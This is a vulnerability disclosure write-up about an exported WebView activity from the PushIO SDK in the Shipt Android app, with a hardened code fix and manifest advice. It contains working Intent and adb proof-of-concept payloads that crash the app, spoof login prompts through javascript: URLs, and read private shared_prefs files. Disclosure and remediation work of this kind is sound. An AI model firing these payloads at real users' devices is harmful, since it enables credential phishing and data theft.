Vulnerability study | Attacking an exported WebView Activity

Vulnerability description

com.pushio.manager.iam.ui.PushIOMessageViewActivity is exported (android:exported is true), which makes the activity reachable from any other app on the device:

```xml
<activity android:name="com.pushio.manager.iam.ui.PushIOMessageViewActivity" android:theme="@android:style/Theme.Translucent.NoTitleBar">
    <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.DEFAULT"/>
        <category android:name="android.intent.category.BROWSABLE"/>
        <data android:scheme="@string/responsys_api_key"/>
    </intent-filter>
</activity>
```

The problem lies in the part of com.pushio.manager.iam.ui.PushIOMessageViewActivity that drives the WebView:

```java
protected void onStart() {
    ...
    // All three inputs come straight from the launching Intent's extras.
    Bundle extras = getIntent().getExtras();
    PIOLogger.d("PIOMVA oS extras: " + extras);
    if (extras != null) {
        final String content = extras.getString(Param.CONTENT);
        final String url = extras.getString("url");
        String viewType = extras.getString("type");
        ...
        if (TextUtils.isEmpty(viewType)) {
            PIOLogger.w("PIOMVA oS view type not found, closing window...");
            finish();
            return;
        } else if (viewType.equalsIgnoreCase(PushIOMessageViewType.ALERT.toString())) {
            ...
            public void run() {
                try {
                    if (PushIOMessageViewActivity.this.mActivityWeakReference != null && PushIOMessageViewActivity.this.mActivityWeakReference.get() != null && !((Activity) PushIOMessageViewActivity.this.mActivityWeakReference.get()).isFinishing()) {
                        PushIOMessageViewActivity.this.mPopupWindow.showAtLocation(PushIOMessageViewActivity.this.mParentLayout, 17, 0, 0);
                        if (!TextUtils.isEmpty(content)) {
                            PushIOMessageViewActivity.this.mWebView.loadDataWithBaseURL(null, content, "text/html", "utf-8", null);
                        } else if (TextUtils.isEmpty(url)) {
                            PushIOMessageViewActivity.this.finish();
                        } else {
                            // "url" is loaded as-is: no scheme or host check.
                            PushIOMessageViewActivity.this.mWebView.loadUrl(url);//load custom url
                        }
                    }
                } catch (BadTokenException e) {
                    PIOLogger.d("PIOMVA oSt " + e.getMessage());
                }
```

With a crafted Intent the `if` checks are satisfied and the activity loads whatever URL or JavaScript the caller supplies.
As the code above shows, once execution reaches the `else` branch the URL is loaded without any restriction at all:

```java
PushIOMessageViewActivity.this.mWebView.loadUrl(url);//load custom url
```
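For contrast, here is how the same `onStart` logic looks once the URL is positively validated. This is an added example, not the PushIO SDK's code: the class name `SafeMessageViewActivity` and the host allow-list `messages.example.com` are assumptions, and the activity is reduced to the `url` path only. The point is that the check must happen before `loadUrl()`, because `shouldOverrideUrlLoading()` is not called for the URL passed to `loadUrl()` itself, and that an `https`-plus-host allow-list rejects the `file:`, `javascript:` and `chrome:` inputs used by every PoC below by construction rather than by a blocklist.

```java
import android.app.Activity;
import android.net.Uri;
import android.os.Bundle;
import android.text.TextUtils;
import android.webkit.WebSettings;
import android.webkit.WebView;
import android.webkit.WebViewClient;

import java.util.Arrays;
import java.util.HashSet;
import java.util.Locale;
import java.util.Set;

// Hypothetical hardened replacement for PushIOMessageViewActivity (added example,
// not the SDK's own code). It still accepts a "url" extra, but only loads it when
// the URL passes an explicit scheme and host allow-list.
public class SafeMessageViewActivity extends Activity {

    // Assumed allow-list: the only host an in-app message may be served from.
    private static final Set<String> ALLOWED_HOSTS =
            new HashSet<>(Arrays.asList("messages.example.com"));

    private WebView mWebView;

    // Positive validation: https only, host on the allow-list. This rejects
    // file:, javascript:, chrome:, content: and intent: URLs without needing
    // to enumerate them.
    static boolean isAllowedUrl(String url) {
        if (TextUtils.isEmpty(url)) {
            return false;
        }
        Uri uri = Uri.parse(url);
        if (!"https".equalsIgnoreCase(uri.getScheme())) {
            return false;
        }
        String host = uri.getHost();
        return host != null && ALLOWED_HOSTS.contains(host.toLowerCase(Locale.ROOT));
    }

    @Override
    protected void onStart() {
        super.onStart();

        Bundle extras = getIntent().getExtras();
        String url = extras == null ? null : extras.getString("url");

        // Validate before touching the WebView: shouldOverrideUrlLoading() is not
        // invoked for the URL handed to loadUrl(), so the initial load must be
        // checked here explicitly.
        if (!isAllowedUrl(url)) {
            finish();
            return;
        }

        mWebView = new WebView(this);
        WebSettings settings = mWebView.getSettings();
        settings.setJavaScriptEnabled(false);          // enable only if the content needs it
        settings.setAllowFileAccess(false);            // no file:// reads (default false on API 30+)
        settings.setAllowContentAccess(false);         // no content:// provider reads
        settings.setAllowFileAccessFromFileURLs(false);
        settings.setAllowUniversalAccessFromFileURLs(false);

        // Keep in-page navigations (links, redirects) inside the allow-list too.
        mWebView.setWebViewClient(new WebViewClient() {
            @Override
            public boolean shouldOverrideUrlLoading(WebView view, String target) {
                // Returning true cancels the navigation.
                return !isAllowedUrl(target);
            }
        });

        setContentView(mWebView);
        mWebView.loadUrl(url);
    }
}
```

The code-level check is defence in depth; the first fix is in the manifest. If the activity is only ever started from inside the app, set `android:exported="false"` on it and drop the BROWSABLE intent-filter. A component that declares an intent-filter is exported by default on older SDKs, and Android 12 refuses to install an app that leaves `android:exported` unspecified on such a component, so the attribute should always be written out explicitly.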

The original reporter exploited this from an adb console and through his own app, HunterExploit.
PoC 1 - kill the process - lets an attacker stop the Shipt process - a threat to information availability. Java PoC:

```java
Intent intent = new Intent("android.intent.action.VIEW");
intent.setClassName("com.shipt.groceries", "com.pushio.manager.iam.ui.PushIOMessageViewActivity");
intent.putExtra("url", "chrome://crash");
intent.putExtra("type", "alert");
startActivity(intent);
```

ADB PoC:
```shell
adb shell am start -n com.shipt.groceries/com.pushio.manager.iam.ui.PushIOMessageViewActivity -a "android.intent.action.VIEW" --es "url" "chrome://crash" --es "type" "alert"
```

PoC 2 - XSS - enables phishing attacks. Java PoC:
A link to a phishing page can be opened inside the app.

```java
Intent intent = new Intent("android.intent.action.VIEW");
intent.setClassName("com.shipt.groceries", "com.pushio.manager.iam.ui.PushIOMessageViewActivity");
intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
intent.putExtra("url", "javascript:{var Login = window.prompt(\"Authorization: Login\", \"Input Login\");var Password = window.prompt(\"Authorization: Password\", \"Input Password\"); alert('Interception of data: '+Login+' '+Password)}");
intent.putExtra("type", "alert");
Intent intentStart = new Intent(Intent.ACTION_MAIN);
intentStart.setComponent(new ComponentName("com.shipt.groceries", "com.shipt.groceries.MainActivity"));
startActivity(intentStart);
try {
    Thread.sleep(10000);
} catch (InterruptedException e) {
    e.printStackTrace();
}
startActivity(intent);
```

ADB PoC:
```shell
adb shell am start -n com.shipt.groceries/com.shipt.groceries.MainActivity
```
Wait for the application to load, then run:
```shell
adb shell am start -n com.shipt.groceries/com.pushio.manager.iam.ui.PushIOMessageViewActivity -a "android.intent.action.VIEW" --es "url" "javascript:{window.prompt('Authorization:Login','Input_Login');window.prompt('Authorization:Password','Input_Password')}" --es "type" "alert"
```
PoC 3 - LFI - lets an attacker read confidential user files without root access - a threat to information confidentiality. Java PoC:
Reads files from the app's private sandbox; if login details are stored in plaintext under shared_prefs, this can also be used to steal them.

```java
Intent intent = new Intent("android.intent.action.VIEW");
intent.setClassName("com.shipt.groceries", "com.pushio.manager.iam.ui.PushIOMessageViewActivity");
intent.putExtra("url", "file:///data/data/com.shipt.groceries/shared_prefs/pushio_store.xml");
intent.putExtra("type", "alert");

startActivity(intent);
```

ADB PoC:
```shell
adb shell am start -n com.shipt.groceries/com.pushio.manager.iam.ui.PushIOMessageViewActivity -a "android.intent.action.VIEW" --es "url" "file:///data/data/com.shipt.groceries/shared_prefs/pushio_store.xml" --es "type" "alert"
```
PoC 4 - read a file or load content from android_asset. Java PoC:
Loading local HTML can be used for an XSS attack.

```java
Intent intent = new Intent("android.intent.action.VIEW");
intent.setClassName("com.shipt.groceries", "com.pushio.manager.iam.ui.PushIOMessageViewActivity");
intent.putExtra("url", "file:///android_asset/www/index.html");
intent.putExtra("type", "alert");

startActivity(intent);
```

ADB PoC:
```shell
adb shell am start -n com.shipt.groceries/com.pushio.manager.iam.ui.PushIOMessageViewActivity -a "android.intent.action.VIEW" --es "url" "file:///android_asset/www/index.html" --es "type" "alert"
```

Impact

  1. An attacker can load JavaScript inside the Shipt app, abusing the trust the user places in it.
  2. The user's private files can be read without root access.
  3. The Shipt process can be crashed.
  4. Application files can be read from android_asset.
  5. Access to the WebView gives an attacker many further avenues of exploitation.

https://hackerone.com/reports/414101
https://pentestlab.blog/2017/02/12/android-webview-vulnerabilities/